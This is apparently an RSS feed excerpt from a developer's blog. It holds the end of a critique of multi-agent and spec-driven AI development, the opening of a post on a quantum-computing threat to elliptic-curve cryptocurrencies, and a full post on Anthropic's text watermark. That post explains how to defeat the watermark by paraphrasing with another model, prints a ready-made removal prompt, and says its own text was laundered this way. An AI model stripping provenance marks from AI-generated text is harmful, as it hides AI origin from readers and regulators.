<p>It makes sense once you remember coordination scales badly. Each additional agent doesn&rsquo;t just add capacity; it adds edges, message contracts, shared state, and conflicting versions of the truth. The router deciding &ldquo;which agent handles this&rdquo; becomes both the bottleneck and the bug farm. A committee of mediocre agents with a conductor doesn&rsquo;t beat one capable agent with good tools and memory.</p>
<p>I&rsquo;ve tested this directly. Back in April I ran <a href="/en/2026/04/25/llm-benchmarks-vale-a-pena-misturar-2-modelos/">three rounds of &ldquo;strong model orchestrating cheaper models&rdquo;</a> — planner + executor, forced delegation, the full package. The result: <strong>no multi-agent combination beat the Opus running solo</strong> in a mature harness. On a cohesive task like building an app, the planner has to read every output from the executor before dispatching the next step — the two become sequential, with tripled latency and a coordination queue in the middle. It&rsquo;s the committee again: lots of talking, little software.</p>
<p>It&rsquo;s not just my benchmark. Cognition, which sells Devin, published <a href="https://cognition.com/blog/dont-build-multi-agents"target="_blank" rel="noopener">&ldquo;Don&rsquo;t Build Multi-Agents&rdquo;</a> with a mechanism sharper than my 90% math: <strong>every action carries implicit decisions the other agents can&rsquo;t see</strong> — one subagent draws a Mario-style background, another draws an incompatible bird, and no amount of individual reliability fixes the divergence.</p>
<p>Anthropic itself, which runs a multi-agent research system, <a href="https://www.anthropic.com/engineering/multi-agent-research-system"target="_blank" rel="noopener">admits in its engineering post</a> that multi-agent burns <strong>15x more tokens</strong>, that coding is a poor fit for it — most coding tasks aren&rsquo;t truly parallelizable — and that 80% of their improvement came from simply spending more tokens, not from the architecture.</p>
<p>When Berkeley measured what actually runs in production, <a href="https://arxiv.org/abs/2512.04123"target="_blank" rel="noopener">86 systems across 26 domains</a>: 68% of production agents execute at most 10 steps before human intervention. What&rsquo;s really out there is the simple supervised loop — not the constellation of colored nodes on the consultant&rsquo;s diagram.</p>
<p>Where orchestration is legitimate: genuinely parallel, independent work — scanning ten thousand files, running ten thousand disposable analyses. Map-reduce has existed for twenty years and never needed a pompous name. And there&rsquo;s one serious corner beyond it: agents running overnight, unwatched, holding credentials — there, independent verifiers and hard budgets become a security matter, not a style one. But that&rsquo;s fleet operations, not the day-to-day coding the course is selling you. Outside those niches, most &ldquo;multi-agent architectures&rdquo; are one agent&rsquo;s job with extra YAML.</p>
<p>There&rsquo;s a reason you hear so much about it: orchestration is <strong>visible</strong> complexity. It has diagrams, colored nodes, dashboards. A well-driven agent has none of that — no slide deck, no certification, nothing to sell.</p>
<blockquote>
  <p><strong>Remember this:</strong> every added agent multiplies the failure modes. If your system&rsquo;s result changes when you swap the orchestrator, your system is the orchestrator — and the model was the costume.</p>

</blockquote>
<h2>The strong argument against spec-driven development<span class="hx:absolute hx:-mt-20" id="the-strong-argument-against-spec-driven-development"></span>
    <a href="#the-strong-argument-against-spec-driven-development" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>SDD sounds mature because it sounds like &ldquo;writing documentation.&rdquo; But look at what it actually proposes: the spec becomes the source of truth and the code becomes a generated artifact. The problem is that <strong>a spec precise enough to generate correct code already is a program</strong> — except written in prose, and prose doesn&rsquo;t compile. Every ambiguity in the spec is a bug no compiler catches, in a medium with no tests, no linter, no feedback. SDD doesn&rsquo;t remove the hard part, which is thinking precisely; it moves the hard part into a format where errors don&rsquo;t scream.</p>
<blockquote>
  <p><strong>Remember this:</strong> a spec precise enough to generate correct code already is a program — except in prose. And prose doesn&rsquo;t compile.</p>

</blockquote>
<p>Even if you write the perfect spec, it starts dying with the first hotfix. A bug shows up in production, someone fixes it straight in the code, and the spec becomes a lie. We&rsquo;ve known this law for decades — it&rsquo;s why documentation rots. Calling the spec the &ldquo;source of truth&rdquo; doesn&rsquo;t change anyone&rsquo;s incentives.</p>
<p>We&rsquo;ve run this experiment before, by the way. UML, MDA, &ldquo;the code generates itself from the model&rdquo; — twenty-odd years ago it was the same promise with different acronyms. It collapsed every time for the same reason: the model was never the reality; the code was. SDD is MDA with an LLM bolted on. And <a href="https://www.alexcloudstar.com/blog/spec-driven-development-2026/"target="_blank" rel="noopener">I&rsquo;m not the only one seeing Waterfall 2.0 there</a>.</p>
<p>The people who tested the tools seriously landed in the same place. Thoughtworks put spec-driven development in the <a href="https://www.thoughtworks.com/radar/techniques/spec-driven-development"target="_blank" rel="noopener">&ldquo;Assess&rdquo; ring of its Technology Radar</a> — not &ldquo;adopt&rdquo;, &ldquo;assess&rdquo; — after watching the tools inflate small tasks into ceremony, and nailed the summary: we may be <em>&ldquo;relearning a bitter lesson — that handcrafting detailed rules for AI ultimately doesn&rsquo;t scale.&rdquo;</em> That&rsquo;s Rich Sutton&rsquo;s Bitter Lesson knocking again — handcrafted structure loses to scale, it always has.</p>
<p>There&rsquo;s also the temporal inversion. The great lesson of agile was that you discover what you want <strong>by building</strong> — working software over comprehensive documentation. LLMs just made iteration cheaper than it&rsquo;s ever been. And what does SDD propose? Expanding the planning phase, right now that iterating got cheap. Wrong answer, wrong direction, wrong time.</p>
<p>It&rsquo;s the thesis I&rsquo;ve been hammering since the first <a href="/en/2026/02/23/vibe-code-built-a-smart-image-indexer-with-ai-in-2-days-frank-sherlock/">Agile Vibe Coding</a> posts: <strong>software emerges, it isn&rsquo;t planned</strong>. <a href="/en/2026/02/20/zero-to-post-production-in-1-week-using-ai-on-real-projects-behind-the-m-akita-chronicles/">I wrote this back in February, with receipts</a>: the most important features of the M.Akita Chronicles were born from problems that showed up mid-way — a job that failed silently, a site that blocked the gem, a crash that left emails in limbo. No spec in the world predicts that. The correct system emerges from iteration, not from specification.</p>
<p>The process got documented again when ai-memory grew through 26 contributors in 24 days: <a href="/en/2026/06/14/ai-memory-emergent-architecture-malleable-software/">good software is a clay sculpture, not a Lego tower</a> — malleable, always adjustable, never done. Whoever tries to design the whole architecture before the first line builds a straitjacket, not a system. Only amateurs still believe you can spec out an entire piece of software before coding it. Real modeling doesn&rsquo;t come from templates or courses — <a href="/2023/08/11/akitando-144-modelagem-de-software-e-dificil-ver-vs-enxergar/">I covered this years ago in Akitando 144</a> (video in Portuguese): it&rsquo;s born from a repertoire of real problems and real code. There&rsquo;s no ready-made recipe; there never was.</p>
<p>SDD tries to resurrect the idea that you can plan software ahead of time — the idea the industry buried after decades of projects delivered late, wrong, and over budget. LLMs didn&rsquo;t revalidate that idea; they just gave it a new slide deck.</p>
<p>Even the pro-SDD guides separate the two things: <a href="https://dev.to/krlz/spec-driven-development-in-2026-what-it-is-the-tooling-and-how-teams-actually-use-it-2fk2"target="_blank" rel="noopener">&ldquo;spec-as-source is where the hype lives; spec-anchored is where the value is today&rdquo;</a>. My target here is the former. Where heavy specs are legitimate: large teams, legacy codebases, asynchronous work crossing time zones and sprints — the good old design document, which has always existed and always had value. What doesn&rsquo;t fly is selling that as the new default for everyone.</p>
<p>My benchmark prompt, for the record, is one page of goals. The difference is that I don&rsquo;t trust the prose: I validate by running it. Precision lives in tests, not in paragraphs.</p>
<h2>What you actually need<span class="hx:absolute hx:-mt-20" id="what-you-actually-need"></span>
    <a href="#what-you-actually-need" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I&rsquo;ve already written all of this on this blog, with real-project receipts. It&rsquo;s called <a href="/en/2026/02/23/vibe-code-built-a-smart-image-indexer-with-ai-in-2-days-frank-sherlock/">Agile Vibe Coding</a>, and it fits in a paragraph:</p>
<p>It&rsquo;s XP (eXtreme Programming, the original agile) with an LLM: tests, <a href="/en/2026/04/20/clean-code-for-ai-agents/">Clean Code</a>, CI (continuous integration), pair programming, and deploy. You drive the agent like you&rsquo;d drive a very fast pairing partner: say what you want, watch the execution, correct while mistakes are still cheap. The idea is 10% of the work; the other 90% is normal software engineering, the usual kind. <a href="/en/2026/04/15/how-to-talk-to-claude-code-effectively/">Forget frameworks and three-page templates</a>: what you need is to know what you want, know what you don&rsquo;t want, and know how to validate when it arrives. And you need balance: <a href="/en/2026/04/11/vs-code-is-the-new-punch-card/">neither handing the wheel to the agent nor turning into a comma cop</a>.</p>
<p>That&rsquo;s over 600 hours of it, over half a million lines, dozens of projects shipped. No graphs, no certifications, no loop with an English name.</p>
<blockquote>
  <p><strong>Remember this:</strong> the idea is 10% of the work; the other 90% is plain software engineering, the usual kind.</p>

</blockquote>
<h2>The piece that lets me swap harnesses: ai-memory<span class="hx:absolute hx:-mt-20" id="the-piece-that-lets-me-swap-harnesses-ai-memory"></span>
    <a href="#the-piece-that-lets-me-swap-harnesses-ai-memory" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>One of my own tools is the opposite of taxonomy: <a href="https://github.com/akitaonrails/ai-memory"target="_blank" rel="noopener">ai-memory</a>. It was born from a concrete problem. Every harness stores its session in its own format, and when the conversation gets long, it compacts the history to fit the window — and compaction throws away exactly the details that explain why each decision was made. Then you switch tools and start from zero, with the whole project to re-explain.</p>
<p>ai-memory solves this from outside the harness. It reads the native session without touching the original file and stores everything in a searchable ledger: messages, tool calls with results, compaction summaries, a git checkpoint — every event tagged with its origin (from Claude, Codex, OpenCode). When I open another harness, it gets its own native session and receives only the delta it hasn&rsquo;t seen. When I go back to the previous one, ai-memory resumes it in that client&rsquo;s format and hands over what happened on the others meanwhile.</p>
<p>That&rsquo;s why &ldquo;I swap harnesses like I swap underwear&rdquo; isn&rsquo;t a figure of speech. <strong>The project&rsquo;s knowledge lives in the project, not in one tool&rsquo;s session.</strong> If Anthropic changes pricing, limits, or models tomorrow — and they will — I swap the engine without throwing away the trip. The details of how this works are in <a href="/en/2026/07/20/whats-new-ai-memory-switch-agents-without-losing-session/">this post</a>.</p>
<p>There&rsquo;s an inversion here that takes SDD down as a bonus. Spec-driven development says the source of truth is a document written <strong>before</strong> the work, trying to predict the future, and that the code owes it obedience. ai-memory does the opposite: the source of truth is a <a href="/en/2026/06/16/ai-memory-long-term-memory-karpathy-wiki-self-improvement-hermes-projects/">wiki distilled from the work itself</a> — every session becomes evidence, and what deserves to survive (decisions, rules, gotchas, failed attempts) gets consolidated into short Markdown pages that any agent reads before starting.</p>
<p>The spec tries to guess the project; the wiki records the project. A document written beforehand rots at the first hotfix, because nobody is forced to update it. The wiki is fed by the very act of working — and when it goes stale, you notice immediately, because the agents trip over it every session.</p>
<p>Notice that this is real harness engineering: one tool, written once, solving a problem of mine. No course, no acronym, no certification.</p>
<h2>Conclusion: ask for the receipt<span class="hx:absolute hx:-mt-20" id="conclusion-ask-for-the-receipt"></span>
    <a href="#conclusion-ask-for-the-receipt" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Don&rsquo;t waste time or money on a &ldquo;harness engineering&rdquo; course, &ldquo;loop engineering,&rdquo; or whatever taxonomy is trending this week. It&rsquo;s a shameless attempt to charge you for things you already do if you know basic software engineering.</p>
<p>We&rsquo;ve seen this movie before, by the way. <a href="https://x.com/arantespp/status/2089752215380426951"target="_blank" rel="noopener">Pedro Arantes nailed it on X</a>: <em>&ldquo;Microservices, clean architecture, hexagonal, and Domain-Driven Design are all bullshit to sell more consulting hours and courses.&rdquo;</em> Same story, same script. Each of them was born from a real problem — and became the default for people who didn&rsquo;t have the problem. Microservices for a three-person team, hexagonal architecture for a CRUD (the plain old create-read-update-delete app), DDD to never write code again. The technique passes, the taxonomy stays, the course sells.</p>
<p>So nobody plays dumb: <strong>none of this is useless</strong>. A loop with verification works. A graph works when the flow is genuinely a graph. Heavy specs save large teams. Microservices solved real problems for people with real scale; DDD shines in genuinely complex domains. The problem was never the tool — it&rsquo;s selling the tool as a <strong>silver bullet</strong>, the universal hammer you must apply to everything. Silver bullets don&rsquo;t exist, they never have. Whoever sells you one isn&rsquo;t selling a solution; they&rsquo;re selling a course.</p>
<p>Understand the psychological mechanism, because it&rsquo;s old and efficient: those terms exist to give you <strong>FOMO</strong> (Fear of Missing Out). To make you anxious, thinking you&rsquo;re falling behind, that you&rsquo;re leaving productivity on the table, that everyone else already migrated to the new paradigm and you haven&rsquo;t. Anxiety sells. Once you&rsquo;re insecure, they charge you to implement something you never needed. FOMO is real — and here, it&rsquo;s the business model.</p>
<p>The model is recurring, too — admire the elegance. First they sell you the methodology that <em>generates</em> artifacts — specs, graphs, boards, diagrams. The artifacts multiply, nobody knows where anything is anymore, and guess who shows up? The same consultancy, now selling the tool that <em>manages</em> the artifacts, the course that teaches you to manage the tool, and the artifact-governance workshop. It&rsquo;s the shovel salesman congratulating you on the hole you dug — and offering you a bigger shovel.</p>
<p>Gartner even has an official name for it: <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027"target="_blank" rel="noopener">&ldquo;agent washing&rdquo;</a> — take an existing product, slap the &ldquo;agentic&rdquo; label on it, resell. Their estimate: only about <strong>130 of the thousands</strong> of companies selling themselves as &ldquo;agentic AI&rdquo; are real, and their prediction is that 40% of such projects get canceled by the end of 2027, over cost, unclear value, or badly managed risk. No grudge of mine here: it&rsquo;s the hype cycle, measured, with a public forecast and everything.</p>
<p>Next time an influencer or consultant tries to push those products on you, ask a simple question: <strong>where are your dozens of high-quality open-source projects that got better because of those &ldquo;techniques&rdquo;?</strong></p>
<p>They have nothing to show. I do — <a href="https://github.com/akitaonrails?tab=repositories"target="_blank" rel="noopener">it&rsquo;s all public</a>, with code, benchmarks, and documented process. When technology becomes a commodity, money migrates to taxonomy. Don&rsquo;t be a customer of that migration.</p>
]]></content:encoded><category>artificial-intelligence</category><category>llms</category><category>vibe-coding</category></item><item><title>Understanding Anthropic's AI Watermark: How to Beat It</title><link>https://www.akitaonrails.com/en/2026/08/16/anthropic-ai-watermark-how-to-beat-it/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/16/anthropic-ai-watermark-how-to-beat-it/</guid><pubDate>Sun, 16 Aug 2026 16:00:00 GMT</pubDate><description>&lt;p&gt;Claude now ships with a stamp on it. Since August 2, 2026, Anthropic has been invisibly marking the text of its newest models, with the older ones migrating over the following months.&lt;/p&gt;
&lt;p&gt;No off switch. The backlash came fast: a &lt;a href="https://www.businessinsider.com/claude-users-cancel-subscriptions-citing-anthropic-new-ai-watermark-2026-8"target="_blank" rel="noopener"&gt;wave of subscription cancellations&lt;/a&gt;, with cancellation screenshots making the rounds on X.&lt;/p&gt;
&lt;p&gt;Before you cancel on reflex, it&amp;rsquo;s worth knowing what the mark actually is. It works quite differently from what most people picture, it exists for a concrete reason, and it vanishes with an almost comic ease.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Claude now ships with a stamp on it. Since August 2, 2026, Anthropic has been invisibly marking the text of its newest models, with the older ones migrating over the following months.</p>
<p>No off switch. The backlash came fast: a <a href="https://www.businessinsider.com/claude-users-cancel-subscriptions-citing-anthropic-new-ai-watermark-2026-8"target="_blank" rel="noopener">wave of subscription cancellations</a>, with cancellation screenshots making the rounds on X.</p>
<p>Before you cancel on reflex, it&rsquo;s worth knowing what the mark actually is. It works quite differently from what most people picture, it exists for a concrete reason, and it vanishes with an almost comic ease.</p>
<p>For those in a hurry, the essentials:</p>
<ul>
<li><strong>A statistical bias in the words Claude picks.</strong> Invisible to the reader, detectable only by whoever holds Anthropic&rsquo;s key. Hidden characters and strange fonts stay out.</li>
<li><strong>The origin is European law, the AI Act.</strong> Anthropic signed the EU transparency code and chose to stamp the whole world; the why comes below.</li>
<li><strong>One pass through another LLM erases the stamp.</strong> The signal lives in Claude&rsquo;s word choices; when another model rewrites the text, even a weak local one, the choices become its own and the pattern dissolves. Anthropic itself admits this.</li>
</ul>
<p>Each point in detail below.</p>
<h2>What this watermark actually is<span class="hx:absolute hx:-mt-20" id="what-this-watermark-actually-is"></span>
    <a href="#what-this-watermark-actually-is" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Strike the invisible Unicode character, the hidden space mid-line, the altered font. Anthropic&rsquo;s watermark is <a href="https://www.anthropic.com/news/claude-text-watermark"target="_blank" rel="noopener">statistical</a>: it acts at the moment Claude decides which word to use, precisely at the points where several words would serve equally well.</p>
<p>Every language model assembles text one word at a time, pulling the next from a list of likely candidates. When two or three work equally well, a random number settles it. The watermark changes where that randomness comes from: the number now derives from a secret key combined with the preceding words. The method is inherited from <a href="https://ai.google.dev/responsible/docs/safeguards/synthid"target="_blank" rel="noopener">SynthID-Text</a> at Google DeepMind.</p>
<p>A concrete example. Talking about the weather, &ldquo;the sky was overcast&rdquo; and &ldquo;the sky was grey&rdquo; carry the same information. At these synonym junctions, the key leans Claude one way more often than pure chance would. Each individual choice goes unnoticed, but a long text repeats this decision point hundreds of times, and the whole ends up forming a statistical signature.</p>
<p>Anthropic&rsquo;s announcement is blunt: <strong>the text gains nothing, and no character stays hidden</strong>. The cost stays the same because no extra tokens are generated, and the reading is identical. Whoever holds the key runs a detector, compares the sequence of words against Claude&rsquo;s typical choices, and gets back a probability that the text came from Claude.</p>
<p>And what the mark proves boils down to this: Claude <strong>was involved</strong> at some point. It doesn&rsquo;t distinguish text the model wrote from scratch from text it merely edited heavily. About you, nothing gets recorded: no user, no company, no identified conversation.</p>
<p>The stamp covers text in Claude.ai, the API, Claude Code, and the other products. In code it shows up less, since code rarely lets you swap one term for an equivalent. Files and images take a different route, a signed piece of metadata called C2PA, instead of this text watermark. And the limitation matters: on short or highly factual passages, where almost no word choice exists, the detector weakens.</p>
<h2>Why so many people canceled<span class="hx:absolute hx:-mt-20" id="why-so-many-people-canceled"></span>
    <a href="#why-so-many-people-canceled" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The spark added up three ingredients: mandatory, global reach, and no opt-out. The mark can&rsquo;t be switched off and applies outside Europe too. A wave of Claude Max subscribers <a href="https://www.forbes.com/sites/maryroeloffs/2026/08/11/claude-will-put-invisible-watermarks-on-ai-text-and-images-and-the-internet-isnt-happy/"target="_blank" rel="noopener">canceled citing control and authorship</a> of their own material.</p>
<p>The fear is concrete, professional and academic. Drafting with Claude and signing the result as your own becomes a liability if, down the road, a detector points at &ldquo;went through AI&rdquo;. <a href="https://gizmodo.com/anthropic-explains-its-watermark-system-as-some-claude-users-loudly-revolt-2000799022"target="_blank" rel="noopener">Anthropic answered with a post</a> insisting the mark preserves reading, meaning, and quality, only signaling processing. Not everyone bought it.</p>
<h2>The European law behind the stamp<span class="hx:absolute hx:-mt-20" id="the-european-law-behind-the-stamp"></span>
    <a href="#the-european-law-behind-the-stamp" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The stamp was born of a concrete obligation. <a href="https://artificialintelligenceact.eu/article/50/"target="_blank" rel="noopener">Article 50 of the AI Act</a> requires providers of generative AI systems to mark output in machine-readable form, so artificial content can be identified as such. The obligation took effect on August 2, 2026, and violating it costs real money: fines up to €15 million or 3% of annual global revenue.</p>
<p>Back in July 2026, Anthropic had signed the European Commission&rsquo;s Code of Practice on Transparency for AI-Generated Content, alongside other major model providers, in a group of roughly 190 signatories. The others will implement their own watermarks too, each with its own key and its own method.</p>
<p>That left Anthropic with a decision: restrict marking to Europe or extend it to the whole planet. The company says it still has no durable way to scope the mark by region, so it chose to stamp everything, everywhere, from day one. Hence the stamp showing up in the text of Brazilian and Japanese subscribers, who have nothing to do with European law.</p>
<h2>Can you remove it by passing the text through another LLM?<span class="hx:absolute hx:-mt-20" id="can-you-remove-it-by-passing-the-text-through-another-llm"></span>
    <a href="#can-you-remove-it-by-passing-the-text-through-another-llm" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>That&rsquo;s the question I get most. Short answer: yes, and it&rsquo;s easy. The signal lives in Claude&rsquo;s word choices; when another model rewrites the text, the choices become that model&rsquo;s, and the statistical pattern comes apart.</p>
<p>Anthropic itself admits it. Light retouching probably leaves pieces of the mark, but <strong>a complete rewrite, with every word swapped, kills the signal</strong>. The logic is simple: the detector measures which synonyms Claude preferred; if another model picked its own synonyms, there&rsquo;s nothing of Claude left to measure.</p>
<p>Academia confirms the direction. <a href="https://arxiv.org/abs/2508.20228"target="_blank" rel="noopener">Robustness tests of SynthID</a>, done at Queen&rsquo;s University, start from perfect detection with no attack and show the rate dropping to around 84% after a dedicated paraphraser, and below 70% with round-trip translation. The more aggressive the rewrite, the more the signal degrades.</p>
<p>And yes, your intuition is right: <strong>a modest model, even a local one, does the job</strong>. Rearranging text while preserving the meaning is a task that calls for zero deep reasoning. A GLM, a Kimi, a small Llama running on your machine rewrites the paragraph and wipes the signature along the way. Swapping &ldquo;overcast&rdquo; for &ldquo;grey&rdquo; a thousand times is nowhere near needing the smartest model on the market.</p>
<p>Two honest caveats. The rewrite has to be genuine, word by word; a spell-checker pass doesn&rsquo;t come close to counting. And all of this applies to the text watermark: files and images carry that C2PA metadata, which comes off by another method, stripping the file&rsquo;s metadata.</p>
<h2>What prompt would pull this off<span class="hx:absolute hx:-mt-20" id="what-prompt-would-pull-this-off"></span>
    <a href="#what-prompt-would-pull-this-off" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Add up the watermark&rsquo;s criteria and the removal prompt practically writes itself. The mark inhabits synonym and structure choices, survives light editing, and needs text of some length. So the prompt has to demand maximum vocabulary and structure swap while holding the meaning in place.</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Rewrite the text below in full, in your own words.
</span></span><span class="line"><span class="cl">Replace the vocabulary and restructure the sentences from start to finish:
</span></span><span class="line"><span class="cl">pick different synonyms, change the order of the clauses, vary the construction.
</span></span><span class="line"><span class="cl">Keep the exact meaning, the facts, and the tone.
</span></span><span class="line"><span class="cl">Avoid reproducing any literal expression from the original.
</span></span><span class="line"><span class="cl">Return only the rewritten text.
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Text:
</span></span><span class="line"><span class="cl">&#34;&#34;&#34;
</span></span><span class="line"><span class="cl">&lt;paste the Claude text here&gt;
</span></span><span class="line"><span class="cl">&#34;&#34;&#34;</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Each line targets one criterion. &ldquo;In your own words&rdquo; and &ldquo;replace the vocabulary&rdquo; dismantle the synonym junctions where the mark hides. &ldquo;Restructure the sentences&rdquo; and &ldquo;change the order of the clauses&rdquo; break the word sequence the detector compares. &ldquo;Avoid reproducing any literal expression&rdquo; seals the gaps a light edit would leave open.</p>
<p>No magic here, and that&rsquo;s by design. Anthropic knows the limit and says it plainly: the mark is soft, attests that Claude touched the text, and disappears in the face of a serious rewrite. It works as a provenance label in a world where most people will never bother to erase it; against whoever decides to erase it, the signal is weak.</p>
<h2>Where this leaves us<span class="hx:absolute hx:-mt-20" id="where-this-leaves-us"></span>
    <a href="#where-this-leaves-us" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>In my accounting, the watermark scares less and does less than both sides of the shouting advertise. It&rsquo;s invisible, carries zero data about you, and proves at most that Claude passed through the text. A rewrite in any model dissolves it. It&rsquo;s a deliberately weak provenance label, designed to satisfy European law.</p>
<p>Still, canceling over it follows a logic I understand. Compulsory, planetary marking with no exit door irritates the people paying for the tool. And of the roughly 190 signatories to the European Code, Claude was the first to hit the headlines, absorbing the revolt wave all alone.</p>
<p>If you just want to use Claude and get on with your life, the day-to-day difference is barely there. If you need your text not to scream &ldquo;AI&rdquo;, a paragraph rewritten in a local model fixes it, and the recipe comes straight from Anthropic itself. The noise ended up much bigger than the hole.</p>
<h2>How this text was made<span class="hx:absolute hx:-mt-20" id="how-this-text-was-made"></span>
    <a href="#how-this-text-was-made" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Transparency suits the subject. The first draft of this article was written by Claude. Then Kimi ran the fact-check, claim by claim, against the original sources, and caught an invented statistic along the way, which we corrected. Finally, GLM rewrote the entire text, word by word, following the recipe from the sections above.</p>
<p>In other words: the article applies to itself what it teaches. It left Claude, passed through Kimi&rsquo;s sieve, and came back with GLM&rsquo;s vocabulary and construction. If the original draft carried the watermark, the complete rewrite swapped the word choices, and with them the signal. With no public detector, nobody can check from the outside; the recipe, anyone can test.</p>
]]></content:encoded><category>llms</category><category>security</category><category>law-and-regulation</category></item><item><title>What the Google Quantum Vulnerability Paper Means</title><link>https://www.akitaonrails.com/en/2026/08/16/what-the-google-quantum-vulnerability-paper-means/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/16/what-the-google-quantum-vulnerability-paper-means/</guid><pubDate>Sun, 16 Aug 2026 10:00:00 GMT</pubDate><description>&lt;p&gt;A Google paper dropped, and the predictable headline came with it: &amp;ldquo;quantum computer will break Bitcoin.&amp;rdquo; On the other side, the &amp;ldquo;it&amp;rsquo;s FUD, ignore it&amp;rdquo; crowd answered at the same volume. Both reactions are wrong, and the paper itself is far more interesting than either shouting match.&lt;/p&gt;
&lt;p&gt;The document is called &lt;a href="https://arxiv.org/abs/2603.28846"target="_blank" rel="noopener"&gt;Securing Elliptic Curve Cryptocurrencies against Quantum Vulnerabilities&lt;/a&gt;, and the author list alone forces you to take it seriously: it&amp;rsquo;s Google Quantum AI (with Craig Gidney, the same guy behind the recent &lt;a href="https://en.wikipedia.org/wiki/RSA_%28cryptosystem%29"target="_blank" rel="noopener"&gt;RSA&lt;/a&gt;-breaking estimates), plus the Ethereum Foundation (Justin Drake) and Stanford (Dan Boneh, one of the fathers of &lt;a href="https://en.wikipedia.org/wiki/Elliptic-curve_cryptography"target="_blank" rel="noopener"&gt;elliptic-curve cryptography&lt;/a&gt;). This is people who build quantum computers sitting at the same table as people who invented a good chunk of the cryptography running today. Rare weight for a subject that usually attracts a lot of hot takes from folks who never read a line of what they&amp;rsquo;re trashing.&lt;/p&gt;</description><content:encoded><![CDATA[<p>A Google paper dropped, and the predictable headline came with it: &ldquo;quantum computer will break Bitcoin.&rdquo; On the other side, the &ldquo;it&rsquo;s FUD, ignore it&rdquo; crowd answered at the same volume. Both reactions are wrong, and the paper itself is far more interesting than either shouting match.</p>
<p>The document is called <a href="https://arxiv.org/abs/2603.28846"target="_blank" rel="noopener">Securing Elliptic Curve Cryptocurrencies against Quantum Vulnerabilities</a>, and the author list alone forces you to take it seriously: it&rsquo;s Google Quantum AI (with Craig Gidney, the same guy behind the recent <a href="https://en.wikipedia.org/wiki/RSA_%28cryptosystem%29"target="_blank" rel="noopener">RSA</a>-breaking estimates), plus the Ethereum Foundation (Justin Drake) and Stanford (Dan Boneh, one of the fathers of <a href="https://en.wikipedia.org/wiki/Elliptic-curve_cryptography"target="_blank" rel="noopener">elliptic-curve cryptography</a>). This is people who build quantum computers sitting at the same table as people who invented a good chunk of the cryptography running today. Rare weight for a subject that usually attracts a lot of hot takes from folks who never read a line of what they&rsquo;re trashing.</p>
<p>First things first: <strong>read the paper directly</strong>. It&rsquo;s long and dense, but written with rare care, including an explicit effort not to turn into FUD.</p>
<p>What I&rsquo;m doing here is my own read, then comparing it with what GLM, Kimi, and ChatGPT made of it when I asked them to tear the text apart, and finally trying to answer the question that matters to anyone holding a handful of satoshis or ether: in the real world, what are the odds a quantum computer steals your money in the next few years?</p>
<p>I&rsquo;ll tip the spirit of it upfront: the sky isn&rsquo;t falling. But the &ldquo;start moving now&rdquo; message has real grounding, and the reason is subtler than &ldquo;quantum is coming.&rdquo;</p>
<p>The short version, for the impatient:</p>
<ul>
<li><strong>The paper is serious and the math holds.</strong> Google, the Ethereum Foundation, and Stanford show that breaking secp256k1 dropped to under 500,000 physical qubits and about 9 minutes, in a conditional scenario already confirmed by open, independent reproduction.</li>
<li><strong>This measures the machine&rsquo;s size; the date stays open.</strong> Today&rsquo;s best hardware works with about 12 logical qubits, and the attack asks for more than 1,200. On IBM&rsquo;s roadmap, hardware of the right size shows up around 2033.</li>
<li><strong>Bitcoin isn&rsquo;t ending.</strong> The risk hits whoever has an exposed public key, a subset of addresses (around 6.9 million BTC, much of it already lost). A modern no-reuse wallet stays safe at rest, and mining is at no risk at all.</li>
<li><strong>What you can do.</strong> As a user, key hygiene: a fresh address per use, no reuse (a stronger password doesn&rsquo;t help against quantum). As an industry, start the post-quantum migration now, in layers, without throwing everything out.</li>
</ul>
<p>Below, each of these points in full: what the paper says, where I agree and disagree with the other models, the real odds with timelines, and what to do in practice.</p>
<h2>What the paper actually says, in plain engineer terms<span class="hx:absolute hx:-mt-20" id="what-the-paper-actually-says-in-plain-engineer-terms"></span>
    <a href="#what-the-paper-actually-says-in-plain-engineer-terms" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Let me get the jargon out of the way first. The security of Bitcoin, Ethereum, and almost all crypto rests on a math problem: given a public key, computing the matching private key is infeasible. Everyone sees your public key; nobody can walk back from it to your private key. That one-way street is what makes a digital signature worth anything.</p>
<p><a href="https://en.wikipedia.org/wiki/Shor%27s_algorithm"target="_blank" rel="noopener">Shor&rsquo;s algorithm</a>, running on a big enough quantum computer, breaks exactly that one-way street. It turns &ldquo;infeasible&rdquo; into &ldquo;a matter of minutes.&rdquo; That&rsquo;s been known since 1994. The paper&rsquo;s news is something else, and it&rsquo;s five points.</p>
